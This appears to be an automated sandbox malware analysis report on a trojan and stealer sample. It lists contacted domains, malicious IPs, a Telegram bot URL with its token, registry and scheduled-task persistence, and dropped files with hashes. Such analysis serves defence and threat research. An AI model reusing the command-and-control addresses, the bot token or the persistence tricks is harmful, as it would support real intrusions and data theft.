http://x1.c.lencr.org/0	cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	false
http://x1.i.lencr.org/0	cd2469328d.exe, 0000000B.00000003.2661316073.0000000003564000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741109099.0000000005E6C000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3648198395.00000000060FC000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752667484.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	false
https://api.telegram.org/	cc6f25572f.exe, 00000010.00000002.2886690972.000002B0C3880000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.all	142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmp	false
http://.jpg	b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	false
https://www.google.com/earch	cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767858563.000001D669944000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766754549.000001D669938000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767490885.000001D66993D000.00000004.00000020.00020000.00000000.sdmp	false
https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o	cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1AF8000.00000004.00000020.00020000.00000000.sdmp	false
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	cd2469328d.exe, 0000000B.00000003.2663747077.0000000003531000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmp	false
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmp	false
https://pancakedipyps.click/L	cd2469328d.exe, 0000000B.00000003.2792015764.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2792985078.0000000000D2F000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp	false
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY	b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	false
https://drive-autopush.corp.google.com/	cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false
https://drive.usercontent.google.com/	cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B1A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2843354005.000002B0C1B80000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2863634118.000002B0C1B77000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2843436830.000002B0C1B26000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893918748.000001D66997B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873269821.000001D669978000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873026803.000001D66996D000.00000004.00000020.00020000.00000000.sdmp	false
https://cheapptaxysu.click/apiz2	5cda6c90d7.exe, 0000000C.00000003.2860832487.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2872096119.00000000017D4000.00000004.00000020.00020000.00000000.sdmp	false
https://ipinfo.io/missi	cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B55000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.google.com/presentation/installwebapp?usp=chrome_defaultF	cc6f25572f.exe, 00000010.00000003.2753252739.000002B0C1B18000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2753189352.000002B0C1B08000.00000004.00000020.00020000.00000000.sdmp	false
https://pancakedipyps.click/bu	cd2469328d.exe, 0000000B.00000003.2770485636.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2770600450.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2793080227.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp	false
https://drive-preprod.corp.googl	cc6f25572f.exe, 00000010.00000003.2753529340.000002B0C1B03000.00000004.00000020.00020000.00000000.sdmp	false
https://cheapptaxysu.click/33	5cda6c90d7.exe, 0000000C.00000003.2659442912.00000000017A3000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	cd2469328d.exe, 0000000B.00000002.2793903700.0000000003530000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2766963059.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmp	false
https://drive-daily-6.corp.google.com/	cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.121.15.192	home.fivetk5sb.top	Spain	207046	REDSERVICIOES	true
172.217.19.228	unknown	United States	15169	GOOGLEUS	false
98.85.100.80	httpbin.org	United States	11351	TWC-11351-NORTHEASTUS	false
212.193.31.8	unknown	Russian Federation	57844	SPD-NETTR	true
142.250.181.132	www.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
172.67.209.202	pancakedipyps.click	United States	13335	CLOUDFLARENETUS	true
185.156.73.23	unknown	Russian Federation	48817	RELDAS-NETRU	false
104.21.89.115	fieldhitty.click	United States	13335	CLOUDFLARENETUS	true
142.250.181.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
104.21.21.99	discokeyus.lat	United States	13335	CLOUDFLARENETUS	true
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
216.58.208.238	drive.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.21.67.146	cheapptaxysu.click	United States	13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579386
Start date and time:	2024-12-22 02:14:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 21m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	54
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@160/109@40/20
EGA Information:	Successful, ratio: 60%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.17.78, 64.233.162.84, 184.28.90.27, 216.58.208.227, 64.233.164.84, 52.149.20.212, 13.107.246.63, 172.217.17.67, 172.217.19.234, 20.190.147.0, 52.168.117.173, 51.105.71.137, 172.217.19.206, 142.250.181.74
Excluded domains from analysis (whitelisted): prod.detectportal.prod.cloudops.mozgcp.net, slscr.update.microsoft.com, spocs.getpocket.com, clientservices.googleapis.com, aus5.mozilla.org, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, contile.services.mozilla.com, content-signature-2.cdn.mozilla.net, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, push.services.mozilla.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, prod.classify-client.prod.webservices.mozgcp.net, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, self.events.data.microsoft.com, detectportal.firefox.com, ctldl.windowsupdate.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, youtube.com, shavar.services.mozilla.com, umwatson.events.data.microsoft.com, clients.l.google.com, location.services.mozilla.com
Execution Graph export aborted for target cd2469328d.exe, PID 7808 because there are no executed function
Execution Graph export aborted for target cd2469328d.exe, PID 7820 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:15:03	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
01:16:39	Task Scheduler	Run new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
01:16:45	Task Scheduler	Run new task: MyBootTask path: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
01:16:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
01:17:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
01:17:48	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 142c991362.exe C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
01:17:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 35f0a75b93.exe C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
01:18:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2e4e1b8516.exe C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe
01:18:12	Task Scheduler	Run new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
01:18:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 54682ac64c.exe C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exe
01:18:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 142c991362.exe C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
01:18:40	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 35f0a75b93.exe C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
01:18:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2e4e1b8516.exe C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe
01:19:00	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 54682ac64c.exe C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exe
01:19:37	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
20:16:02	API Interceptor	6566461x Sleep call for process: skotes.exe modified
20:16:28	API Interceptor	8x Sleep call for process: cd2469328d.exe modified
20:16:34	API Interceptor	8x Sleep call for process: 5cda6c90d7.exe modified
20:16:39	API Interceptor	705067x Sleep call for process: Gxtuum.exe modified
20:17:30	API Interceptor	542091x Sleep call for process: b6638733e4.exe modified
20:17:36	API Interceptor	77x Sleep call for process: graph.exe modified
20:17:49	API Interceptor	835x Sleep call for process: 142c991362.exe modified
20:18:04	API Interceptor	55278x Sleep call for process: c9d0f96e57.exe modified
20:18:27	API Interceptor	775x Sleep call for process: 35f0a75b93.exe modified
20:18:46	API Interceptor	6x Sleep call for process: af155ed129.exe modified

Process:	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, Author: ditekSHen
Reputation:	unknown
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	123394
Entropy (8bit):	7.993523589542907
Encrypted:	true
SSDEEP:	1536:NoxiTioXtBWFfsYExW94I9tiiGCidzWdZNF9p3Ymn9Zqmi943C42nYEmL9yqhTjV:yxFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre
MD5:	53E54AC43786C11E0DDE9DB8F4EB27AB
SHA1:	9C5768D5EE037E90DA77F174EF9401970060520E
SHA-256:	2F606D24809902AF1BB9CB59C16A2C82960D95BFF923EA26F6A42076772F1DB8
SHA-512:	CD1F6D5F4D8CD19226151B6674124AB1E10950AF5A049E8C082531867D71BFAE9D7BC65641171FD55D203E4FBA9756C80D11906D85A30B35EE4E8991ADB21950
Malicious:	true
Reputation:	unknown
Preview:	PK........DwiY(..wj...........graph.exe..{\|...8......f....D]5..HP..d..... Q@b.1.[$.\..&.p.....j.-.V..6...=P!.U@...K....>.sf7..b...._/...3....<....oY/..A...................u....].l.(...UyWuv....\x....w.......0\|_.].e........==.m.qq....v....g...~o.........~.V?@.s.......z.......#\|.o..........~.].X...%.A......>..xZ.p.0.:.2a.U..PZ...E.^.`>......+d.9..s.x..O.....+............K.2...3...9.M......k3;j.[o.*mg..U.%!...A+.....3O6T{...o....j.:.4.]m...q.{..&...?.A....Q[.\|..x.K.X....U.\|..V/,......6...\|w.s..@0BX...O.I..._..R..@~T.2.t..IK?..M.E.\|^............B._C.....-..y;....V.......,\|f.wl......:...T./4TbV.\.+..H.....2%.sZ..D.#..}.o..x..w... ..p.!..,..o ...S.]......].}.......c.w..2...<s........!.2'....m.v.><...Ox...O.(C.....@....T.o.Uwm......(ve<...x.f3..\...D..X._.G.7.3.l;..>tQ...5.e..D...lO.i{./..;.JgK........ ...tJ. I.....>..8..Pa...=.Il.S..?.)..@}...:..Cmh.;.v...T.{K..9.)Pqg.%..5.....6..<w..........`-..+h..oA...2.K.......{.."..Wu.;I..w.^o...

C:\Program Files\Windows Media Player\graph\graph.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	251392
Entropy (8bit):	6.173345887744036
Encrypted:	false
SSDEEP:	6144:TxwndeWCdXSpfDYlUgEP86yZ7JUlfQEc:Tx1dXYYlLEP8l7J8
MD5:	7D254439AF7B1CAAA765420BEA7FBD3F
SHA1:	7BD1D979DE4A86CB0D8C2AD9E1945BD351339AD0
SHA-256:	D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
SHA-512:	C3164B2F09DC914066201562BE6483F61D3C368675AC5D3466C2D5B754813B8B23FD09AF86B1F15AB8CC91BE8A52B3488323E7A65198E5B104F9C635EC5ED5CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.1!am_ram_ram_r.\sdm_r.Zs.m_rq.\skm_rq.[sqm_r.[spm_rq.Zs8m_r.^shm_ram^r.m_r.Vs`m_r.r`m_r*.]s`m_rRicham_r........PE..d...../g.........."....).\|...n.................@............................. ............`.....................................................d...............`'...................A..p...........................`@..@...............h............................text....z.......\|.................. ..`.rdata..............................@..@.data...$-..........................@....pdata..`'.......(..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\ProgramData\DAECAECF

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJECBGDAKKJDGHII

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECFCBKJDBFIJKFHIIDAA

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIEHDBGDHDAECBGDHJKFIDGCBF

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIDAECGD

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEHIJDGIEBKKFHJKJKEG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	11896
Entropy (8bit):	5.482137486750097
Encrypted:	false
SSDEEP:	192:EnaRtLYbBp6thj4qyaaX86K19l5RfGNBw8djSl:ZeDquqTcwu0
MD5:	086F2F557B3EBD77B81FBD45385F1EE3
SHA1:	5B72A245BA1E5722CACF3FF5ECCB2AB634E459CD
SHA-256:	2A4738558CD2656998A9DEF60E08AC7F93F0573EB83F3CF3571EE02D8F15168B
